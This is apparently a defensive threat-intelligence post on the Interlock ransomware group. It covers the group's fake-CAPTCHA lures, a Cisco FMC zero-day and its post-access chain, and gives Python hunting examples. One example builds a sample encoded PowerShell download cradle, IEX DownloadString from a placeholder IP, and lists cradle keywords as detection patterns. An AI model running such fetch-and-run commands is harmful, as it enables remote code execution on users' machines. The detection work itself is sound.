For about a year, the most reliable way to get hit by Interlock ransomware was to paste a command into your own Run dialog because a fake CAPTCHA told you to. The group built an entire intrusion practice on that single moment of misplaced trust: a compromised website, a “verify you are human” prompt, a one-liner the victim copied and ran by hand. It worked well enough to put Interlock on a joint CISA–FBI advisory by July 2025.
Then, on January 26, 2026, Interlock stopped waiting for anyone to make a mistake.
That is the date Amazon’s MadPot honeypot network first recorded exploitation of CVE-2026-20131, an unauthenticated, root-level remote code execution flaw in Cisco Secure Firewall Management Center. The bug carried a CVSS of 10.0. Cisco would not disclose it for another 36 days. For more than a month, the same crew that had been tricking receptionists into pasting PowerShell was instead deserializing malicious Java objects straight into the root context of the appliance that governs an organization’s entire firewall fleet.
This is the part of the Interlock story worth your attention. Not that a ransomware group exists (there are dozens), but that a single group now operates fluently at both ends of the sophistication ladder, and treats social engineering and pre-auth zero-day exploitation as interchangeable means to the same end. If your threat model still files “user got phished” and “perimeter appliance got popped” as separate problems with separate owners, Interlock has already invalidated it.
A Group That Refuses to Stand Still
Interlock was first observed in late September 2024. By the time CISA, the FBI, HHS, and MS-ISAC published joint advisory AA25-203A in July 2025, the group had compiled a track record against businesses, healthcare providers, and critical infrastructure across North America and Europe. It runs a double-extortion model: exfiltrate first, encrypt second, then threaten to leak whatever was stolen if the ransom goes unpaid. The encryptors exist for both Windows and Linux and are built to encrypt virtual machines on both, using AES for bulk data and RSA to wrap the keys. Encrypted files get a .interlock or .1nt3rlock extension, and victims find a !__README__!.txt ransom note waiting for them.
None of that is novel. What makes Interlock worth a full anatomy is the trajectory. Most ransomware crews find a delivery mechanism that works and ride it into the ground. Interlock keeps re-tooling, and the 14 months between its first sighting and the Cisco campaign trace a clean line from opportunistic social engineering to deliberate, capital-intensive zero-day operations.
Act One: Tricking the Human (2024–2025)
Interlock’s early access game was built on the web. Starting around May 2025, its activity was tied to the LandUpdate808 web-inject cluster (better known as KongTuke), which compromises legitimate websites and injects a single line of script into the page HTML, usually without the site owner ever noticing. Visitors to those poisoned pages got served a lure.
The lure was ClickFix. A victim sees a fake CAPTCHA or a “fix this browser error” prompt and is walked through opening the Windows Run dialog, pasting a supplied command, and pressing Enter. The command is a PowerShell download cradle that pulls the next stage. The social engineering is the entire exploit; there is no memory corruption, no patch that fixes it, nothing for a scanner to flag. The user is the vulnerability.
By mid-2025 the group iterated on the technique itself. The FileFix variant, documented by Arctic Wolf and The DFIR Report, swaps the Run dialog for the File Explorer address bar, which most users have never been told to distrust and which many application-control policies do not cover. Same outcome, wider blast radius.
The payload evolved in parallel. The original Interlock RAT, tracked as NodeSnake, was a custom, modular JavaScript implant with no relationship to any public codebase: file transfer, process injection and hollowing, credential theft via custom and commodity stealers, screenshot capture. In July 2025 researchers documented a PHP-based rewrite of the RAT delivered through FileFix. The move to PHP was a deliberate evasion play: a portable interpreter that runs almost anywhere, sidesteps detection tuned for classic Windows executables, and is far faster to modify than a Node.js application. Command and control ran through Cloudflare Tunnel (trycloudflare.com), which gives the operators a free, TLS-wrapped, reputable-looking channel that blends into traffic no one blocks.
This is a competent, evolving social-engineering operation. It is also fundamentally rate-limited by human behavior. Someone has to fall for the prompt. That ceiling is exactly what Act Two removes.
Act Two: Owning the Appliance (2026)
CVE-2026-20131 lives in the web-based management interface of Cisco Secure Firewall Management Center. The root cause is insecure deserialization of a user-supplied Java byte stream: the interface accepts serialized Java objects and feeds them into object handling without sufficient validation. An unauthenticated remote attacker sends a crafted serialized object to the management interface, triggers arbitrary Java code execution, and lands as root. No credentials. No user interaction. No CAPTCHA to paste.
Amazon’s threat intelligence team reconstructed the exploit flow from MadPot sensor data after Cisco’s disclosure. The malicious requests hit a specific path in the FMC software, and the request bodies carried Java code-execution attempts plus two embedded URLs: one to deliver configuration data supporting the exploit, and a second to confirm success by forcing the vulnerable target to perform an outbound HTTP PUT and upload a file the attacker generated. That HTTP PUT is the cleanest forensic tell in the whole chain, and we will come back to it.
Cisco disclosed CVE-2026-20131 on March 4, 2026, alongside a second maximum-severity FMC bug, CVE-2026-20079, and shipped fixed software; the only remediation is upgrading to version 7.4.2.1 or later. CISA added CVE-2026-20131 to the Known Exploited Vulnerabilities catalog on March 19. By then Interlock had been inside the window for nearly two months.
The deserialization bug class is the unglamorous, undefeated champion of appliance compromise. We have watched the same primitive (untrusted serialized data hitting a Java or Python sink) turn up in management planes, inference servers, and middleware for two decades. The lesson Interlock is teaching is not that deserialization is dangerous; everyone knows that. It is that a ransomware affiliate now has the capability, or the budget, to weaponize a fresh one against a Tier-1 vendor’s flagship security appliance and sit on it as a zero-day.
Why Firewall Management Center Is the Worst Possible Thing to Lose
It is tempting to file this under “another edge device CVE.” It is worse than that, and the difference matters for how you prioritize the patch.
A firewall is one enforcement point. The Firewall Management Center is the brain that programs every firewall it manages: the policy plane, the place where rules, objects, NAT, VPN configuration, and access control for an entire fleet are authored and pushed. Compromising one firewall gets an attacker through one door. Compromising FMC as root gets them authorship of the doors. They can push policy, open paths, disable inspection, harvest the configuration of the whole estate, and do it from the one box your network implicitly trusts to reconfigure security controls.
This is the same structural lesson the Kubernetes controller-token and OAuth-pivot stories taught in different clothing: the management plane is a more valuable target than anything it manages, and it is routinely protected as if it were just another host. An attacker who owns FMC does not need to move laterally in the usual sense. The appliance’s legitimate function is lateral movement. That is why a management-plane RCE deserves emergency-change-window treatment, not next-Tuesday triage, and why so many shops got the priority wrong.
The Kill Chain, End to End
Whichever door Interlock comes through (pasted PowerShell or a deserialized Java object), the post-access playbook converges. AA25-203A and subsequent vendor reporting describe a consistent chain:
- Foothold and tooling. Drop a remote access tool and a beacon. Interlock has leaned on Cobalt Strike, AnyDesk, PuTTY, and RMM software including ScreenConnect, which is precisely why Cisco’s mitigation guidance for the FMC bug tells operators to audit for unauthorized ScreenConnect installations. An unexpected RMM agent on a security appliance is not a footnote; it is the intrusion.
- Persistence. A scheduled task named `TaskSystem` (ATT&CK T1053.005), registry Run keys, or `.lnk` shortcuts dropped into the Startup folder (T1547.001). Valid stolen accounts (T1078) keep VPN and RDP access alive even if the malware is cleaned up.
- Credential access. Custom stealers alongside commodity ones (Lumma and Berserk) to harvest browser secrets, tokens, and domain credentials.
- Discovery and lateral movement. Hands-on-keyboard reconnaissance, then movement across the estate using the credentials and trust the appliance hands them for free.
- Exfiltration. AzCopy pushing stolen data to attacker-controlled Azure storage blobs. Outbound traffic to a major cloud provider’s storage endpoints is exactly the kind of thing that looks legitimate in a NetFlow review, which is the point.
- Impact. AES+RSA encryption across Windows and Linux hosts and their VMs, `.interlock` extension, `!__README__!.txt` note, leak-site countdown.
The chain is unremarkable once you are inside. That is the uncomfortable part: the sophistication is entirely front-loaded into initial access, and everything after the front door is well-trodden tradecraft your EDR has seen a hundred times. If you are catching Interlock at the encryption stage, you missed it five steps earlier.
The 36-Day Head Start
Lay the timeline out and the structural problem is obvious:
- January 26, 2026: first in-the-wild exploitation of CVE-2026-20131 (MadPot).
- March 4, 2026: Cisco discloses and patches; FMC 7.4.2.1 ships.
- March 19, 2026: CISA adds the CVE to the KEV catalog.
For 36 days the vulnerability existed only in the attacker’s hands. Defenders could not patch what they did not know about, could not write detections for an undisclosed bug, and could not hunt for IOCs that had not been published. The only controls that mattered during that window were the ones already in place before anyone knew the CVE existed: whether the FMC management interface was reachable from the internet, whether management traffic was segmented, whether anomalous outbound connections from a security appliance would have tripped anything.
This is the dwell-time problem inverted. We usually talk about dwell time as how long an attacker sits undetected after breaking in. The zero-day window is dwell time before the defensive community even knows the door exists, and for a pre-auth, root-level bug on an internet-exposed management plane, 36 days is more than enough to ransom everyone who left the interface facing the internet. The patch, when it landed, was a deadline for the attacker, not a save for the victim.
What This Means for Detection
You cannot retro-detect a zero-day in real time, but the FMC exploit leaves artifacts, and Interlock’s post-access behavior is noisy if you are looking. Concrete, defensible hunts:
On Firewall Management Center. Hunt logs retroactively from January 26, 2026 forward. The highest-value signals:
An FMC appliance has no legitimate reason to initiate an outbound HTTP PUT to an unfamiliar host. That single behavior is worth a high-severity alert on its own.
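The retroactive FMC hunt described above, as an added example that is not part of the original post or of any Cisco tooling: it runs the two checks the text calls out (an outbound HTTP PUT from the appliance to a host outside its known egress, and Java deserialization failures in the application log) over constructed sample lines. The log layouts, the host names and the allowlist are assumptions; map them onto whatever your FMC actually emits.

```python
import re

# Constructed sample egress records from the appliance, in an assumed
# "<ts> src=<host> method=<M> dst=<host> path=<p>" layout (not a real FMC log format).
SAMPLE_EGRESS_LOG = """\
2026-01-27T03:12:44Z src=fmc01 method=GET dst=tools.cisco.com path=/updates/check
2026-01-27T03:13:02Z src=fmc01 method=PUT dst=203.0.113.45 path=/upload/out.bin
2026-01-27T03:13:05Z src=fmc01 method=POST dst=siem.corp.internal path=/events
2026-01-28T11:40:10Z src=fmc01 method=PUT dst=198.51.100.7 path=/r/confirm
"""
# Constructed application-log excerpt; the exception names are real Java classes, the messages are made up.
SAMPLE_APP_LOG = """\
2026-01-27 03:13:01 WARN request parse failed: java.io.StreamCorruptedException: invalid stream header
2026-01-27 03:13:02 ERROR unhandled: java.lang.ClassNotFoundException: org.example.Gadget
\tat java.base/java.io.ObjectInputStream.readObject(ObjectInputStream.java:496)
2026-01-27 03:15:00 INFO policy deploy complete
"""

# Hosts the appliance is expected to contact (assumed allowlist; build yours from a known-good baseline).
KNOWN_EGRESS = {"tools.cisco.com", "siem.corp.internal"}
EGRESS_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) method=(?P<method>\S+) dst=(?P<dst>\S+) path=(?P<path>\S+)$")
# Exceptions that surface when ObjectInputStream is fed bytes it was never meant to see.
DESER_RE = re.compile(
    r"java\.io\.(?:StreamCorruptedException|InvalidClassException|OptionalDataException)"
    r"|java\.lang\.ClassNotFoundException|ObjectInputStream\.readObject")


def hunt_outbound_put(log_text, known=KNOWN_EGRESS, since="2026-01-26"):
    """Return (ts, dst, path) for every outbound HTTP PUT from the appliance to a host
    outside the allowlist, on or after `since` (ISO date; string compare is safe for ISO-8601)."""
    hits = []
    for line in log_text.splitlines():
        m = EGRESS_RE.match(line)
        if not m or m["ts"][:10] < since:
            continue
        if m["method"].upper() == "PUT" and m["dst"] not in known:
            hits.append((m["ts"], m["dst"], m["path"]))
    return hits


def find_deserialization_errors(log_text):
    """Return application-log lines carrying Java deserialization failures; a burst of these
    right before an unexplained PUT is the pairing worth escalating."""
    return [ln for ln in log_text.splitlines() if DESER_RE.search(ln)]
```

Any hit from `hunt_outbound_put` on a management appliance should open an incident, not a ticket; the allowlist exists only to suppress the update and SIEM traffic you have already baselined.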
For the ClickFix/FileFix vector. The richest artifact is the Run dialog itself. Windows records what users type into Run under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, a near-perfect forensic record of a ClickFix paste. Pair that with process telemetry:
explorer.exe spawning an encoded PowerShell download cradle is not something benign users do. For FileFix specifically, watch for processes launched with a parent context of File Explorer where the command line is a network fetch. And inventory C2 egress: connections to trycloudflare.com subdomains from servers that have no business using ad-hoc Cloudflare tunnels deserve a look.
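The ClickFix/FileFix checks above, as an added example that is not part of the original post: it flags PowerShell spawned by File Explorer whose command line (after decoding `-EncodedCommand`, which is how ClickFix pastes usually arrive) performs a network fetch, and it reads a RunMRU dump in most-recent-first order. The process events and the RunMRU contents are constructed; the event field names are an assumption rather than any EDR vendor's schema, while the RunMRU layout (values `a`..`z` holding `command\1`, ordered by `MRUList`) is the real one.

```python
import base64
import re

# Network-fetch markers the author's guidance calls out: a download cradle is a fetch plus execution,
# but the fetch alone is enough to alert on when the parent is explorer.exe.
FETCH_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|https?://", re.I)
# -e / -enc / -EncodedCommand followed by a base64 blob (UTF-16LE script). "-ep bypass" does not match.
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)

# Constructed sample: an encoded cradle of the kind a fake CAPTCHA tells the user to paste (203.0.113.9 is a documentation address).
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.txt')".encode("utf-16-le")).decode()
EVENTS = [  # constructed process-creation events; field names are an assumption
    {"parent": "explorer.exe", "image": "powershell.exe", "cmdline": f"powershell.exe -w hidden -enc {ENCODED}"},
    {"parent": "explorer.exe", "image": "powershell.exe", "cmdline": "powershell.exe -NoProfile -c Get-Date"},
    {"parent": "cmd.exe", "image": "powershell.exe", "cmdline": "powershell.exe -c iwr http://intranet.example/x.ps1"},
]
RUNMRU = {"MRUList": "ba", "a": "notepad\\1", "b": "powershell -w hidden -enc " + ENCODED + "\\1"}  # constructed


def decode_command(cmdline):
    """Return the effective script text: the -EncodedCommand payload decoded if present, else the raw line."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # undecodable blob: keep the raw line so the fetch check still runs on it


def hunt_clickfix(events):
    """Flag PowerShell with a File Explorer parent whose decoded command line performs a network fetch."""
    hits = []
    for ev in events:
        if ev["parent"].lower() != "explorer.exe" or ev["image"].lower() not in ("powershell.exe", "pwsh.exe"):
            continue
        script = decode_command(ev["cmdline"])
        if FETCH_RE.search(script):
            hits.append((ev["image"], script))
    return hits


def parse_runmru(values):
    """Return the RunMRU commands most recent first, with the trailing '\\1' marker removed."""
    order = values.get("MRUList", "")
    return [values[k][:-2] if values[k].endswith("\\1") else values[k] for k in order if k in values]
```

Running `decode_command` over RunMRU entries too (they are pasted verbatim, so they carry the same `-enc` blob) lets one rule cover both the registry artifact and the process event.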
For the authoritative IOC and ATT&CK mapping (file hashes, infrastructure, the full technique table), go to CISA AA25-203A and the Cisco advisory rather than trusting any single blog’s reproduction, including this one.
What Defenders Should Do This Week
Skip the abstractions. If you run Cisco Secure Firewall Management Center, or you have users with Windows endpoints, here is the list:
- Patch FMC to 7.4.2.1 or later, now, if you have not. CVE-2026-20131 is on the KEV; it is being exploited by a ransomware crew that had a 36-day head start. There is no configuration workaround: only the upgrade.
- Get management interfaces off the internet. FMC, and every appliance management plane, belongs on a segmented management network reachable only through a bastion or VPN with MFA. The single biggest factor in whether the 36-day window hurt you was internet exposure of the management interface. This is the control that would have saved you before the CVE had a number.
- Run the retroactive hunt from January 26, 2026. Patching closes the door; it tells you nothing about whether someone already walked through. Pull FMC logs and look for the outbound HTTP PUT and Java deserialization errors. Treat any unexplained outbound connection from the appliance as compromise until proven otherwise.
- Audit security appliances for RMM and remote-access tooling. Unauthorized ScreenConnect, AnyDesk, or similar on or near FMC is a post-exploitation indicator, not a misconfiguration.
- Make ClickFix a named detection, not a security-awareness slide. Alert on `explorer.exe`-parented PowerShell download cradles and monitor `RunMRU`. Awareness training has a known failure rate; the telemetry does not get tired.
- Constrain the egress your appliances and servers are allowed. AzCopy to unfamiliar Azure blobs and tunnels to `trycloudflare.com` are exfiltration and C2 hiding in reputable traffic. Default-deny outbound from infrastructure that has no reason to talk to arbitrary cloud endpoints turns both into alerts.
The Uncomfortable Lesson
The reason Interlock deserves a full anatomy is not its encryptor or its leak site. It is that one group now runs the entire spectrum of initial access, from a fake CAPTCHA that costs nothing to a CVSS 10.0 zero-day against a Tier-1 firewall vendor, and moves between them as the opportunity dictates. The same operators who will trick your front desk into pasting PowerShell on Monday will deserialize a Java object into the root of your firewall manager on Tuesday.
Most security programs are still organized around the assumption that these are different adversaries with different budgets and different targets. Phishing is the awareness team’s problem; appliance CVEs are the infrastructure team’s problem; ransomware is the IR team’s problem. Interlock is a single adversary that has made all three the same problem. Initial access is now polymorphic, and the entry vector tells you almost nothing about the sophistication of who is on the other end of it.
So plan for the convergence. Assume the crew that phishes you can also burn a zero-day, and that the appliance you trust to enforce policy is exactly the thing they want to own. Get the management planes off the internet, instrument them like the high-value targets they are, and stop treating the front door and the firewall’s brain as separate threat models. Interlock already stopped.